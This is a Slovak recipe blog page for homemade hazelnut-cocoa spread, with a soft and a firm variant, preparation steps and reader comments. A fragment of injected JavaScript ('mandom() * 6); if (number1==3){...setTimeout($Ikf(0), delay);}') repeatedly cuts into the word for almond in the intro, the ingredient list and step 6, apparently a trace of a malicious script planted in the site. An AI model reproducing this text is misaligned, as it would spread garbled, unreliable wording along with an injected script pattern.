Orieškovo-kakaová nátierka

Milujeme ju. Keď si ju natriete na domáce ražno-špaldové rohlíky,  spolu to chutí ako čokoládové croissanty 😀 Mám tu pre vás recept hneď na dva druhy. Ta prvá, základná nátierka je krémovejšia, redšia a vláčnejšia a tá druhá je hutná, pevná a dajú sa z nej tvarovať gulôčky. Môžete do nich ukryť lieskový oriešok, alebo mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľu a obaliť v mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľovom, či lieskovom prachu, alebo v kakaovom prášku a dať vychladiť do chladničky.
Tak poďme na to 🙂 Množstvá sú stanovené podľa môjho mixéra, do ktorého sa mi viac lieskovcov nezmestí, porcia to v konečnom dôsledku nie je veľká 🙂

Základné ingrediencie

  • 200 g  olúpaných lieskových orieškov
  • štipka himalájskej soli
  • 2 pl kvalitného belgického kakaa
  • 60 g zlatého muscovado cukru (množstvo si môžete upraviť, nám to vyhovuje takto)
  • 1kl sušenej mletej vanilky
  • 2 pl ghee masla

Tuhá nátierka na plnenie do buchiet napríklad

  • 40 g mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľovej drte, čo zostane po výrobe domáceho mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľového mlieka (ak nemáte mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľovú drť, môžete skúsiť zamixovať do toho mleté mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle, ale treba si upraviť množstvo)

Postup

  1. Olúpané lieskové oriešky dáme piecť do rúry na 200 stupňov cca 9 minút. Vysypeme na utierku a šúchaním ich zbavíme šupiek. Potom ich pomelieme na mlynčeku na orechy. Ja ho mám ako súčasť domáceho robota. Ide to raz dva. Môžete ich hodiť celé aj do mixéra, mne sa to ale mletím zdá jednoduchšie a predchádzam tým väčším kúskom v nátierke.
  2. Nastrúhané, alebo pomleté oriešky vložíme do mixéra so 4 nožmi a dobrým výkonom. Pridáme štipku soli a začneme mixovať. Vždy, keď sa nám oriešky usadia na kraji misky, ako vidíte na obrázku, lyžicou ich zoškrabte znovu do stredu a zase mixujte, kým sa neusadia na kraji a zase postup zopakujte. Oškrabávam tak 2, maximálne 3 krát a potom už začnú oriešky púšťať olej a menit sa na pastu.
  3. V tom momente, ako uvidíte, že oriešky vlhnú, pridajte kakao a vanilku a zase mixujte. Pôjde to už ľakho a uvidíte, ako sa pekne zmes v mixéri točí. Už je to takmer hotovo 😀
  4. Keď už máte z orieškov a kakaa vláčnu pastu, pridajte muscovado cukor a vymixujte do ešte jemnejšieho krému. Pridajte 2 pl ghee masla, poriadne ešte raz premixujte a máme hotovo.
  5. Odložte do chladničky a používajte podľa potreby.
  6. Pre tuhú variantu iba v poslednom kroku nahradte ghee maslo mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andľovou drťou a poriadne premixujte. 🙂

Želám vám dobrú chuť 🙂
Ohodnoť Recept

4 komentáre

  1. Mirka, skusala som vas recept viac krat ale nikdy mi nutelu nepripomínal. Vadí mi, ze zomlete oriesky maju taku pieskovu kozistenciu, a zvlastne nahorklu chut, asi opecenim. Prosim vas,daria sa vam zomliet uplne na krem? Dakujem beata

     
    • Nahorklu chut maju oriesky vtedy, ked sa prilis dlho pecu. Mozno mate vykonnejsiu ruru a staci orieskom menej piect 🙂 HOrke urcite nemaju byt. Mne sa v mixeri oriesky zomelu az na takmer tekutinu…Jasne, ze to nechuti uplne ako nutela, ale ako ferrero napriklad 🙂 Skuste menej piect oriesky, ale urcite necakajte uplne rovnaku chut, ako nutelu a ani tak jemnucke to asi nebude 🙂 Alebo este mi napadlo, ze tu horkost moze sposobit aj kakao..su rozne druhy a chutia rozne…ja mam prave belgicke kakao, velmi odporucam 🙂

       
  2. Ja davam miesto ghee kokosovy olej a do chladnicky ma to potom tak dobru konzistenciu a miesto kakaa belgicku cokoladu

     

Napíš Koment